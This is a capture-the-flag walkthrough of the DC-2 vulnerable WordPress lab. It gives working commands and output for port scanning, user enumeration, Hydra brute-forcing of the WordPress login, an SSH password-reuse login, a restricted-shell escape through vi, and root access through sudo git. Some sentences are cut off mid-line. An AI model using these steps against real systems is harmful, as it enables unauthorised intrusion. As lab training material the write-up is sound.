Operating System: Linux
Release: 22 Mar 2019
Description: Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it's designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Starting with a regular nmap scan we see that only one port is open.
nmap -sC -sV 192.168.1.139 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-24 20:10 CET Nmap scan report for dc-2 (192.168.1.139) Host is up (0.000079s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 – Just another WordPress site MAC Address: 00:0C:29:31:D7:6F (VMware)
But doing a scan on all ports reveals that another port is open.
nmap -p- -sC -sV 192.168.1.139 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-24 20:12 CET Nmap scan report for dc-2 (192.168.1.139) Host is up (0.000054s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 – Just another WordPress site 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 00:0C:29:31:D7:6F (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Going to the website we find a Wordpress install and also Flag #1.
The webpage mentions
cewl which is a program that can generate password list by crawling web pages for different words.
We will use
cewl shortly to generate our password list.
Knowing we're dealing with a Wordpress install, we can use
wpscan to enumerate wordpress for usernames.
Running the following command revels three usernames
wpscan --enumerate u --url dc-2
[+] admin | Detected By: Rss Generator (Passive Detection) | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] jerry | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
Awesome! We now have three usernames which I added to
Now, let's generate a password list and see if we can bruteforce the Wordpress login.
cewl -m 2 -w passwords.txt http://dc-2 CeWL 220.127.116.11 (Arkanoid) Robin Wood (firstname.lastname@example.org) (https://digi.ninja/)
The passwords generated from crawling the web page is now stored in
cewl we have 263 different passwords.
wc -l passwords.txt 263 passwords.txt
Now, let's use Hydra to bruteforce the Wordpress login. Using the usernames we found when running
wpscan and the passwords from
hydra -L users.txt -P passwords.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-03-24 20:33:01 [DATA] max 16 tasks per 1 server, overall 16 tasks, 789 login tries (l:3/p:263), ~50 tries per task [DATA] attacking http-post-form://dc-2:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location [http-post-form] host: dc-2 login: tom password: parturient [STATUS] 554.00 tries/min, 554 tries in 00:01h, 235 to do in 00:01h, 16 active [http-post-form] host: dc-2 login: jerry password: adipiscing 1 of 1 target successfully completed, 2 valid passwords found
We successfully bruteforced the passwords for
Logging into Wordpress reveals flag #2 and a hint for what we should do next.
Poking around we find nothing else interesting. But knowing people tend to use the same password across services, let's see if the username/password combinations also works for ssh.
We can't ssh in as
jerry but we successfully get in as
root@kali:~# ssh tom@dc-2 -p 7744 tom@dc-2's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have mail. Last login: Sun Mar 24 16:41:21 2019 from 192.168.1.115 tom@DC-2:~$ id -rbash: id: command not found
... And we're stuck in
Looking around we find that we have access to
vi. Breaking out of jail should be a piece of cake.
vi we can do this to break out of
:set shell=/bin/sh :shell
$ whoami /bin/sh: 2: whoami: not found
Sweet! We just need to restore our $PATH so we can run all programs we have access to.
$ export PATH=/usr/sbin:/usr/bin:/sbin:/bin
$ id uid=1001(tom) gid=1001(tom) groups=1001(tom)
We can now also cat flag #3.
$ cat flag3.txt Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Always, I mean always try the low hanging fruit first. Maybe
$ sudo -l [sudo] password for tom: Sorry, user tom may not run sudo on DC-2.
Okay, maybe not. But how about changing user to
jerry with his password?
$ su jerry Password: jerry@DC-2:/home/tom$
And looking at flag #4.
jerry@DC-2:~$ cat flag4.txt Good to see that you've made it this far - but you're not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you're on your own now. :-) Go on - git outta here!!!!
I mean, the last line kinda spoils the way to root, but anyways.
Checking the low hanging fruit reveals we can run
jerry@DC-2:~$ sudo -l Matching Defaults entries for jerry on DC-2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git
Knowing we can get command execution using git, getting a root shell should be really easy now.
By executing the following command we're dropped into the manual pages of
sudo git help status
From here we can execute commands and thus get a root shell doing the following.
root@DC-2:~# cat final-flag.txt __ __ _ _ _ _ / / /\ \ \___| | | __| | ___ _ __ ___ / \ \ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ / \ /\ / __/ | | | (_| | (_) | | | | __/\_/ \/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/ Congratulatons!!! A special thanks to all those who sent me tweets and provided me with feedback - it's all greatly appreciated. If you enjoyed this CTF, send me a tweet via @DCAU7.